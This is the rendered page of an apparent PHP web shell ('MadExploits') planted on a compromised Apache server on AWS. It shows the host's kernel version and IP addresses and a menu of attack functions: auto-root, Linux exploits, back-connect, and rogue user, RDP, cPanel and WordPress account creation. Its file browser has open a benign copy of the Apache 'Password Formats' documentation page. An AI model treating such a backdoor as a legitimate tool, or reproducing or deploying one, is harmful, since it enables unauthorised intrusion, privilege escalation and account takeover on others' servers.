Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.145.79.94
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
apache /
manual /
misc /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
550
B
-rw-r--r--
index.html.en
5.04
KB
-rw-r--r--
index.html.es
5.71
KB
-rw-r--r--
index.html.fr.utf8
5.37
KB
-rw-r--r--
index.html.ko.euc-kr
5.14
KB
-rw-r--r--
index.html.tr.utf8
5.27
KB
-rw-r--r--
index.html.zh-cn.utf8
4.75
KB
-rw-r--r--
password_encryptions.html
231
B
-rw-r--r--
password_encryptions.html.en
12.43
KB
-rw-r--r--
password_encryptions.html.fr.u...
13.38
KB
-rw-r--r--
perf-tuning.html
398
B
-rw-r--r--
perf-tuning.html.en
49.49
KB
-rw-r--r--
perf-tuning.html.fr.utf8
57.2
KB
-rw-r--r--
perf-tuning.html.ko.euc-kr
46.75
KB
-rw-r--r--
perf-tuning.html.tr.utf8
56.14
KB
-rw-r--r--
relevant_standards.html
328
B
-rw-r--r--
relevant_standards.html.en
12.14
KB
-rw-r--r--
relevant_standards.html.fr.utf...
13.01
KB
-rw-r--r--
relevant_standards.html.ko.euc...
11.1
KB
-rw-r--r--
security_tips.html
406
B
-rw-r--r--
security_tips.html.en
26.58
KB
-rw-r--r--
security_tips.html.fr.utf8
28.78
KB
-rw-r--r--
security_tips.html.ko.euc-kr
18.53
KB
-rw-r--r--
security_tips.html.tr.utf8
29.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password_encryptions.html.en
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /> <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX This file is generated from xml source: DO NOT EDIT XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> <title>Password Formats - Apache HTTP Server Version 2.4</title> <link href="../style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet" /> <link href="../style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size" /> <link href="../style/css/manual-print.css" rel="stylesheet" media="print" type="text/css" /><link rel="stylesheet" type="text/css" href="../style/css/prettify.css" /> <script src="../style/scripts/prettify.min.js" type="text/javascript"> </script> <link href="../images/favicon.ico" rel="shortcut icon" /></head> <body id="manual-page"><div id="page-header"> <p class="menu"><a href="../mod/">Modules</a> | <a href="../mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossary</a> | <a href="../sitemap.html">Sitemap</a></p> <p class="apache">Apache HTTP Server Version 2.4</p> <img alt="" src="../images/feather.png" /></div> <div class="up"><a href="./"><img title="<-" alt="<-" src="../images/left.gif" /></a></div> <div id="path"> <a href="http://www.apache.org/">Apache</a> > <a href="http://httpd.apache.org/">HTTP Server</a> > <a href="http://httpd.apache.org/docs/">Documentation</a> > <a href="../">Version 2.4</a> > <a href="./">Miscellaneous Documentation</a></div><div id="page-content"><div id="preamble"><h1>Password Formats</h1> <div class="toplang"> <p><span>Available Languages: </span><a href="../en/misc/password_encryptions.html" title="English"> en </a> | <a href="../fr/misc/password_encryptions.html" hreflang="fr" rel="alternate" title="Français"> fr </a></p> </div> <p>Notes about the password encryption formats generated and understood by Apache.</p> </div> <div id="quickview"><a href="https://www.apache.org/foundation/contributing.html" class="badge"><img src="https://www.apache.org/images/SupportApache-small.png" alt="Support Apache!" /></a><ul id="toc"><li><img alt="" src="../images/down.gif" /> <a href="#basic">Basic Authentication</a></li> <li><img alt="" src="../images/down.gif" /> <a href="#digest">Digest Authentication</a></li> </ul><h3>See also</h3><ul class="seealso"><li><a href="#comments_section">Comments</a></li></ul></div> <div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div> <div class="section"> <h2><a name="basic" id="basic">Basic Authentication</a></h2> <p>There are five formats that Apache recognizes for basic-authentication passwords. Note that not all formats work on every platform:</p> <dl> <dt>bcrypt</dt> <dd>"$2y$" + the result of the crypt_blowfish algorithm. See the APR source file <a href="http://svn.apache.org/viewvc/apr/apr/trunk/crypto/crypt_blowfish.c?view=markup">crypt_blowfish.c</a> for the details of the algorithm.</dd> <dt>MD5</dt> <dd>"$apr1$" + the result of an Apache-specific algorithm using an iterated (1,000 times) MD5 digest of various combinations of a random 32-bit salt and the password. See the APR source file <a href="http://svn.apache.org/viewvc/apr/apr/trunk/crypto/apr_md5.c?view=markup">apr_md5.c</a> for the details of the algorithm.</dd> <dt>SHA1</dt> <dd>"{SHA}" + Base64-encoded SHA-1 digest of the password. Insecure.</dd> <dt>CRYPT</dt> <dd>Unix only. Uses the traditional Unix <code>crypt(3)</code> function with a randomly-generated 32-bit salt (only 12 bits used) and the first 8 characters of the password. Insecure.</dd> <dt>PLAIN TEXT (i.e. <em>unencrypted</em>)</dt> <dd>Windows & Netware only. Insecure.</dd> </dl> <h3>Generating values with htpasswd</h3> <div class="example"><h3>bcrypt</h3><p><code> $ htpasswd -nbB myName myPassword<br /> myName:$2y$05$c4WoMPo3SXsafkva.HHa6uXQZWr7oboPiC2bT/r7q1BB8I2s0BRqC </code></p></div> <div class="example"><h3>MD5</h3><p><code> $ htpasswd -nbm myName myPassword<br /> myName:$apr1$r31.....$HqJZimcKQFAMYayBlzkrA/ </code></p></div> <div class="example"><h3>SHA1</h3><p><code> $ htpasswd -nbs myName myPassword<br /> myName:{SHA}VBPuJHI7uixaa6LQGWx4s+5GKNE= </code></p></div> <div class="example"><h3>CRYPT</h3><p><code> $ htpasswd -nbd myName myPassword<br /> myName:rqXexS6ZhobKA </code></p></div> <h3>Generating CRYPT and MD5 values with the OpenSSL command-line program</h3> <p>OpenSSL knows the Apache-specific MD5 algorithm.</p> <div class="example"><h3>MD5</h3><p><code> $ openssl passwd -apr1 myPassword<br /> $apr1$qHDFfhPC$nITSVHgYbDAK1Y0acGRnY0 </code></p></div> <div class="example"><h3>CRYPT</h3><p><code> openssl passwd -crypt myPassword<br /> qQ5vTYO3c8dsU </code></p></div> <h3>Validating CRYPT or MD5 passwords with the OpenSSL command line program</h3> <p>The salt for a CRYPT password is the first two characters (converted to a binary value). To validate <code>myPassword</code> against <code>rqXexS6ZhobKA</code></p> <div class="example"><h3>CRYPT</h3><p><code> $ openssl passwd -crypt -salt rq myPassword<br /> Warning: truncating password to 8 characters<br /> rqXexS6ZhobKA </code></p></div> <p>Note that using <code>myPasswo</code> instead of <code>myPassword</code> will produce the same result because only the first 8 characters of CRYPT passwords are considered.</p> <p>The salt for an MD5 password is between <code>$apr1$</code> and the following <code>$</code> (as a Base64-encoded binary value - max 8 chars). To validate <code>myPassword</code> against <code>$apr1$r31.....$HqJZimcKQFAMYayBlzkrA/</code></p> <div class="example"><h3>MD5</h3><p><code> $ openssl passwd -apr1 -salt r31..... myPassword<br /> $apr1$r31.....$HqJZimcKQFAMYayBlzkrA/ </code></p></div> <h3>Database password fields for mod_dbd</h3> <p>The SHA1 variant is probably the most useful format for DBD authentication. Since the SHA1 and Base64 functions are commonly available, other software can populate a database with encrypted passwords that are usable by Apache basic authentication.</p> <p>To create Apache SHA1-variant basic-authentication passwords in various languages:</p> <div class="example"><h3>PHP</h3><p><code> '{SHA}' . base64_encode(sha1($password, TRUE)) </code></p></div> <div class="example"><h3>Java</h3><p><code> "{SHA}" + new sun.misc.BASE64Encoder().encode(java.security.MessageDigest.getInstance("SHA1").digest(password.getBytes())) </code></p></div> <div class="example"><h3>ColdFusion</h3><p><code> "{SHA}" & ToBase64(BinaryDecode(Hash(password, "SHA1"), "Hex")) </code></p></div> <div class="example"><h3>Ruby</h3><p><code> require 'digest/sha1'<br /> require 'base64'<br /> '{SHA}' + Base64.encode64(Digest::SHA1.digest(password)) </code></p></div> <div class="example"><h3>C or C++</h3><p><code> Use the APR function: apr_sha1_base64 </code></p></div> <div class="example"><h3>Python</h3><p><code> import base64<br /> import hashlib<br /> "{SHA}" + format(base64.b64encode(hashlib.sha1(password).digest())) </code></p></div> <div class="example"><h3>PostgreSQL (with the contrib/pgcrypto functions installed)</h3><p><code> '{SHA}'||encode(digest(password,'sha1'),'base64') </code></p></div> </div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div> <div class="section"> <h2><a name="digest" id="digest">Digest Authentication</a></h2> <p>Apache recognizes one format for digest-authentication passwords - the MD5 hash of the string <code>user:realm:password</code> as a 32-character string of hexadecimal digits. <code>realm</code> is the Authorization Realm argument to the <code class="directive"><a href="../mod/mod_authn_core.html#authname">AuthName</a></code> directive in httpd.conf.</p> <h3>Database password fields for mod_dbd</h3> <p>Since the MD5 function is commonly available, other software can populate a database with encrypted passwords that are usable by Apache digest authentication.</p> <p>To create Apache digest-authentication passwords in various languages:</p> <div class="example"><h3>PHP</h3><p><code> md5($user . ':' . $realm . ':' .$password) </code></p></div> <div class="example"><h3>Java</h3><p><code> byte b[] = java.security.MessageDigest.getInstance("MD5").digest( (user + ":" + realm + ":" + password ).getBytes());<br /> java.math.BigInteger bi = new java.math.BigInteger(1, b);<br /> String s = bi.toString(16);<br /> while (s.length() < 32)<br /> <span class="indent"> s = "0" + s; </span> // String s is the encrypted password </code></p></div> <div class="example"><h3>ColdFusion</h3><p><code> LCase(Hash( (user & ":" & realm & ":" & password) , "MD5")) </code></p></div> <div class="example"><h3>Ruby</h3><p><code> require 'digest/md5'<br /> Digest::MD5.hexdigest(user + ':' + realm + ':' + password) </code></p></div> <div class="example"><h3>PostgreSQL (with the contrib/pgcrypto functions installed)</h3><p><code> encode(digest( user || ':' || realm || ':' || password , 'md5'), 'hex') </code></p></div> </div></div> <div class="bottomlang"> <p><span>Available Languages: </span><a href="../en/misc/password_encryptions.html" title="English"> en </a> | <a href="../fr/misc/password_encryptions.html" hreflang="fr" rel="alternate" title="Français"> fr </a></p> </div><div class="top"><a href="#page-header"><img src="../images/up.gif" alt="top" /></a></div><div class="section"><h2><a id="comments_section" name="comments_section">Comments</a></h2><div class="warning"><strong>Notice:</strong><br />This is not a Q&A section. Comments placed here should be pointed towards suggestions on improving the documentation or server, and may be removed by our moderators if they are either implemented or considered invalid/off-topic. Questions on how to manage the Apache HTTP Server should be directed at either our IRC channel, #httpd, on Libera.chat, or sent to our <a href="https://httpd.apache.org/lists.html">mailing lists</a>.</div> <script type="text/javascript"><!--//--><![CDATA[//><!-- var comments_shortname = 'httpd'; var comments_identifier = 'http://httpd.apache.org/docs/2.4/misc/password_encryptions.html'; (function(w, d) { if (w.location.hostname.toLowerCase() == "httpd.apache.org") { d.write('<div id="comments_thread"><\/div>'); var s = d.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://comments.apache.org/show_comments.lua?site=' + comments_shortname + '&page=' + comments_identifier; (d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s); } else { d.write('<div id="comments_thread">Comments are disabled for this page at the moment.<\/div>'); } })(window, document); //--><!]]></script></div><div id="footer"> <p class="apache">Copyright 2023 The Apache Software Foundation.<br />Licensed under the <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a>.</p> <p class="menu"><a href="../mod/">Modules</a> | <a href="../mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossary</a> | <a href="../sitemap.html">Sitemap</a></p></div><script type="text/javascript"><!--//--><![CDATA[//><!-- if (typeof(prettyPrint) !== 'undefined') { prettyPrint(); } //--><!]]></script> </body></html>
Close